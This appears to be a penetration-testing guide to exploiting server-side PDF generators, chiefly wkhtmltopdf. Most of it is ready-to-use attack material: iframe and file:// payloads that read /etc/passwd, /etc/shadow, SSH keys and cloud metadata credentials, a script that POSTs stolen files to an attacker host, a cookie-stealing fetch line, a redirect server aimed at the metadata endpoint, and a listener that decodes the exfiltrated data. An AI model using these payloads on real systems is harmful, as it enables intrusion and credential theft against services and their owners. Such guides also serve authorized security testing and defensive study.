PDF Generation Vulnerabilities

What is the Attack Surface

Web applications that generate PDFs from user-controlled HTML (invoices, reports, certificates) typically render it server-side with a headless browser or an HTML-to-PDF library. These engines process the HTML much as a browser would: JavaScript (in some engines), external resources, and local file paths. When user input reaches that HTML without escaping, the renderer becomes a powerful SSRF and LFI vector.

Common libraries:

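Library	Language	Notes
wkhtmltopdf	C++ (Qt/WebKit)	Runs JavaScript; most common SSRF target
DomPDF	PHP	No page JavaScript; renders HTML/CSS; remote fetching controlled by the isRemoteEnabled option
mPDF	PHP	No JavaScript; renders HTML/CSS
html2pdf	PHP/JS	Varies by implementation (PHP library vs. client-side html2pdf.js)
PDFKit / pdfkit	Ruby / Python	Wraps wkhtmltopdf (the Node.js PDFKit is a separate library that does not render HTML)
PD4ML	Java	Enterprise use
WeasyPrint	Python	CSS-focused; no JavaScript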

Detection

Step 1 — Identify PDF generation

Look for features that produce downloadable PDFs from user input:

Invoice generators
Report/export buttons
Certificate generators
Resume builders
Any form where your input appears in a PDF output

Step 2 — Fingerprint the library

Download a generated PDF and inspect its metadata:

exiftool invoice.pdf
pdfinfo invoice.pdf
strings invoice.pdf | grep -i "creator\|producer\|wkhtmltopdf\|dompdf"

Look for:

Creator:  wkhtmltopdf 0.12.6.1
Producer: Qt 4.8.7

Creator:  DomPDF 1.2.0
Producer: dompdf + CPDF

The library name and version tell you which exploits apply.
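The strings/grep check above can be wrapped in a small script. This is a rough sketch under stated assumptions, not a PDF parser: it only finds Creator/Producer values stored as literal strings in uncompressed objects (if the Info dictionary sits in a compressed object stream, fall back to exiftool or pdfinfo), and the signature substrings are typical values rather than an exhaustive list. The function names are illustrative.

```python
import re

# Matches /Creator (...) or /Producer (...) literal strings. Handles backslash
# escapes but not nested, unescaped parentheses.
INFO_RE = re.compile(rb"/(Creator|Producer)\s*\(((?:\\.|[^\\)])*)\)", re.S)

# Substrings checked in order. "dompdf" must precede "mpdf" because
# "dompdf" itself contains "mpdf".
SIGNATURES = [
    ("wkhtmltopdf", "wkhtmltopdf"),
    ("dompdf", "DomPDF"),
    ("mpdf", "mPDF"),
    ("weasyprint", "WeasyPrint"),
    ("pd4ml", "PD4ML"),
    ("skia/pdf", "Chromium-based (headless Chrome)"),
    ("qt ", "wkhtmltopdf (Qt producer)"),
]


def decode_pdf_string(raw: bytes) -> str:
    """Undo \\( \\) \\\\ escapes, then decode UTF-16BE (with BOM) or Latin-1."""
    raw = re.sub(rb"\\([()\\])", rb"\1", raw)
    if raw.startswith(b"\xfe\xff"):
        return raw[2:].decode("utf-16-be", errors="replace")
    return raw.decode("latin-1")


def read_info_strings(data: bytes) -> dict:
    """Collect Creator/Producer values; later (incremental-update) values win."""
    meta = {}
    for key, raw in INFO_RE.findall(data):
        meta[key.decode()] = decode_pdf_string(raw)
    return meta


def guess_library(meta: dict) -> str:
    """Map the metadata strings to a likely renderer name."""
    haystack = " ".join(meta.values()).lower() + " "
    for needle, name in SIGNATURES:
        if needle in haystack:
            return name
    return "unknown"


def fingerprint_file(path: str):
    """Read a PDF from disk and return (metadata dict, guessed library)."""
    with open(path, "rb") as fh:
        meta = read_info_strings(fh.read())
    return meta, guess_library(meta)
```

Usage: meta, guess = fingerprint_file("invoice.pdf"). For the wkhtmltopdf metadata shown above, guess would be "wkhtmltopdf".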

Step 3 — Test for SSRF with Burp Collaborator

Inject an external resource reference into any field that appears in the PDF:

<img src="http://COLLABORATOR_DOMAIN/ssrf_test"/>
<link rel="stylesheet" href="http://COLLABORATOR_DOMAIN/css_test">
<iframe src="http://COLLABORATOR_DOMAIN/iframe_test"></iframe>

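If Burp Collaborator receives an HTTP request, the PDF engine is fetching external resources: SSRF confirmed. A DNS lookup with no follow-up HTTP request shows the hostname was resolved, but outbound HTTP may be filtered.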
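When several fields feed the PDF, giving each field and tag its own hostname makes every Collaborator interaction traceable to its source. A minimal sketch, assuming COLLABORATOR_DOMAIN is replaced with your own Collaborator payload domain; build_probes and dns_label are hypothetical helpers. The field is encoded in a subdomain rather than the URL path so that even a DNS-only interaction identifies it.

```python
import re

# Hypothetical value; replace with your own Collaborator payload domain.
COLLABORATOR_DOMAIN = "your-id.oastify.com"

TEMPLATES = {
    "img": '<img src="http://{host}/">',
    "css": '<link rel="stylesheet" href="http://{host}/">',
    "iframe": '<iframe src="http://{host}/"></iframe>',
}


def dns_label(text: str) -> str:
    """Reduce a field name to a DNS-safe label (lowercase letters, digits, hyphens)."""
    label = re.sub(r"[^a-z0-9-]", "-", text.lower())[:40].strip("-")
    return label or "field"


def build_probes(fields, collab=COLLABORATOR_DOMAIN):
    """Map each field to one probe per tag type, each on a unique subdomain."""
    probes = {}
    for field in fields:
        probes[field] = {
            tag: tpl.format(host=f"{dns_label(field)}-{tag}.{collab}")
            for tag, tpl in TEMPLATES.items()
        }
    return probes
```

Usage: build_probes(["customer_name", "notes"])["notes"]["img"] gives an img probe whose callback host starts with notes-img, so a hit on that host points straight at the notes field.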

Exploit 1: SSRF via Resource Tags (wkhtmltopdf)

wkhtmltopdf is built on QtWebKit, which fetches every linked resource during rendering.

Image tag SSRF

<img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/">

An img request is blind: the metadata response is not image data, so the PDF shows at most a broken-image placeholder, not the credentials. To read the response body, use an iframe.

iframe SSRF (reads the response body into the PDF)

<iframe src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" 
        width="800" height="400"></iframe>

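The iframe renders the response inline, so cloud metadata appears directly in the document. This path returns only the IAM role name; request http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME to obtain the keys. Instances that enforce IMDSv2 reject these requests, because the session token must first be obtained with a PUT request that an iframe cannot send.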

Internal service access

<iframe src="http://127.0.0.1:8080/admin"></iframe>
<iframe src="http://internal.company.local/api/users"></iframe>
<iframe src="http://10.0.0.1/router/admin"></iframe>
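When probing several internal targets in one document, labelling each iframe with its URL makes the resulting PDF easy to read. A hedged sketch: the target list is hypothetical, and build_sweep only emits HTML to paste into a vulnerable field; it sends nothing itself.

```python
from html import escape

# Hypothetical targets; adjust to the environment you are authorized to test.
TARGETS = [
    "http://127.0.0.1:8080/admin",
    "http://internal.company.local/api/users",
    "http://10.0.0.1/router/admin",
]


def build_sweep(targets, width=800, height=200):
    """Emit a visible label plus an iframe for each target URL."""
    parts = []
    for url in targets:
        safe = escape(url, quote=True)  # keep & and quotes from breaking the markup
        parts.append(f"<p>{safe}</p>")
        parts.append(f'<iframe src="{safe}" width="{width}" height="{height}"></iframe>')
    return "\n".join(parts)
```

Usage: print(build_sweep(TARGETS)) and submit the output as the field value; each iframe in the PDF sits under the URL it loaded.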

Exploit 2: LFI via file:// Protocol

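wkhtmltopdf and some other engines resolve file:// URLs, so a tag pointing at a local path pulls that file into the render. wkhtmltopdf 0.12.6 disables local file access by default, so this works only on older versions or when the application passes --enable-local-file-access. Files such as /etc/shadow and /root/.ssh/id_rsa are readable only if the renderer runs as root.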

iframe file read

<iframe src="file:///etc/passwd" width="800" height="600"></iframe>
<iframe src="file:///etc/shadow"></iframe>
<iframe src="file:///root/.ssh/id_rsa"></iframe>
<iframe src="file:///var/www/html/.env"></iframe>
<iframe src="file:///proc/self/environ"></iframe>

object/embed tag

<object data="file:///etc/passwd"></object>
<embed src="file:///etc/passwd">

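img tag for access confirmation

<img src="file:///etc/passwd">

The file won’t render as an image, and a broken-image placeholder on its own is weak evidence. Compare the output against a path that does not exist (for example file:///nonexistent) and look for a difference.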

Exploit 3: JavaScript-Based LFI (wkhtmltopdf / headless Chrome)

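For engines that execute JavaScript and allow file:// requests from the page (wkhtmltopdf with local file access enabled; headless Chrome blocks this by default):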

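<script>
// Synchronous XHR, so the file is read before rendering finishes
var xhr = new XMLHttpRequest();
xhr.open('GET', 'file:///etc/passwd', false);
xhr.send();
// Escape markup so the file renders as text instead of being parsed as HTML
var text = xhr.responseText.replace(/&/g, '&amp;').replace(/</g, '&lt;');
document.write('<pre>' + text + '</pre>');
</script>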

Or exfiltrate via an HTTP request (SSRF + LFI combined):

<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'file:///etc/passwd', false);
xhr.send();
var contents = xhr.responseText;

var exfil = new XMLHttpRequest();
exfil.open('POST', 'http://ATTACKER/collect', false);
exfil.send(btoa(contents));
</script>
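A small listener on the ATTACKER host can receive and decode the POST body. A minimal standard-library sketch, assuming the payload URL is changed to match the listening port (for example http://ATTACKER:8000/collect); decode_body, CollectHandler and serve are illustrative names.

```python
import base64
import binascii
from http.server import BaseHTTPRequestHandler, HTTPServer


def decode_body(body: bytes) -> bytes:
    """Base64-decode an exfiltrated body; return the raw bytes if it is not valid base64."""
    try:
        return base64.b64decode(body.strip(), validate=True)
    except binascii.Error:
        return body


class CollectHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        data = decode_body(self.rfile.read(length))
        print(f"--- {self.client_address[0]} {self.path} ({len(data)} bytes)")
        print(data.decode("utf-8", errors="replace"))
        # The payload never reads the response, so an empty 204 is enough.
        self.send_response(204)
        self.end_headers()


def serve(port: int = 8000) -> None:
    """Listen on all interfaces until interrupted; ports above 1024 need no root."""
    HTTPServer(("0.0.0.0", port), CollectHandler).serve_forever()
```

Usage: call serve() on the attacker host; each decoded file is printed as it arrives.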

Exploit 4: XSS Payload in PDF Context

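If the PDF engine executes JavaScript, injected scripts run server-side inside the renderer, not in a victim’s browser. alert() shows nothing in a headless render, so write the result into the page instead; the PDF then reveals the rendering context (for example a file:// path or an internal hostname):

<script>document.write(window.location.href)</script>

Cookie-stealing payloads matter only where the same input is also reflected into an HTML page served to a browser (for example an HTML preview of the document); the generated PDF itself is not rendered as HTML. Break out of the surrounding attribute and inject:

"><script>fetch('http://ATTACKER/?c='+document.cookie)</script>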

Exploit 5: Redirect-Based SSRF Bypass

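If the PDF engine follows HTTP redirects, chain an open redirect on an allowed domain to reach internal IPs. This bypasses filters that validate only the initial URL, because the internal address appears only in the redirect’s Location header: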

<img src="https://TRUSTED_DOMAIN/redirect?url=http://169.254.169.254/latest/meta-data/">

Or host your own redirect server and point the resource tag at it:

# Python redirect server (binding port 80 needs root or CAP_NET_BIND_SERVICE)
python3 - <<'EOF'
import http.server

TARGET = 'http://169.254.169.254/latest/meta-data/'

class Redirect(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        # Answer every GET with a 302 pointing at the internal target
        self.send_response(302)
        self.send_header('Location', TARGET)
        self.end_headers()

http.server.HTTPServer(('0.0.0.0', 80), Redirect).serve_forever()
EOF

Blind Exploitation

When the PDF is emailed or stored and you can’t see the content directly:

SSRF confirmation — Collaborator ping from any resource tag confirms the engine fetches URLs.

Exfiltrate via POST: use the XMLHttpRequest exfiltration payload from Exploit 3, which POSTs the base64-encoded file to your server. Avoid fetch() in this context: wkhtmltopdf’s QtWebKit engine predates the Fetch API, so a fetch()-based payload will not run.

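Timing: when the PDF is generated synchronously, an SSRF request to a slow or unresponsive internal endpoint delays the response. Compare against a baseline request to infer whether an internal host or port is reachable.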
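Single timings are noisy, so compare medians over several requests. A sketch assuming send is a hypothetical callable you write to submit the PDF-generation request with a given payload; the 2-second threshold is an arbitrary starting point to tune per target.

```python
import statistics
import time
from typing import Callable, List


def sample(send: Callable[[], None], n: int = 5) -> List[float]:
    """Time n calls to send(), returning wall-clock durations in seconds."""
    durations = []
    for _ in range(n):
        start = time.perf_counter()
        send()
        durations.append(time.perf_counter() - start)
    return durations


def looks_delayed(baseline: List[float], probe: List[float], min_gap: float = 2.0) -> bool:
    """True if the probe's median exceeds the baseline's median by at least min_gap seconds."""
    return statistics.median(probe) - statistics.median(baseline) >= min_gap
```

Usage: looks_delayed(sample(lambda: submit(BENIGN)), sample(lambda: submit(SSRF_PAYLOAD))), where submit, BENIGN and SSRF_PAYLOAD are placeholders for your own request code. Medians are used so one slow request does not skew the comparison.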

Burp Suite workflow

Proxy — intercept the PDF generation request; find user-controlled fields.
Repeater — inject <img src="http://COLLABORATOR"> into each field; check Collaborator for callbacks.
For LFI: inject <iframe src="file:///etc/passwd"> and download/inspect the PDF output.
Collaborator — confirm SSRF and use as exfiltration endpoint for blind scenarios.
Decoder — base64-decode any exfiltrated file contents from Collaborator HTTP requests.
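Values copied out of Collaborator sometimes arrive percent-encoded or with padding stripped, and if the value passed through a form decoder, "+" characters become spaces. A hedged helper for the Decoder step, assuming standard (not URL-safe) base64 as produced by btoa; decode_exfil is a hypothetical name.

```python
import base64
from urllib.parse import unquote


def decode_exfil(value: str) -> bytes:
    """Decode base64 copied from a Collaborator request body or query string."""
    # Undo percent-encoding, and turn spaces back into '+' before trimming newlines
    text = unquote(value).replace(" ", "+").strip()
    text += "=" * (-len(text) % 4)  # restore any stripped padding
    return base64.b64decode(text, validate=True)
```

Usage: paste the c= parameter or the POST body into decode_exfil(...) and write the returned bytes to a file.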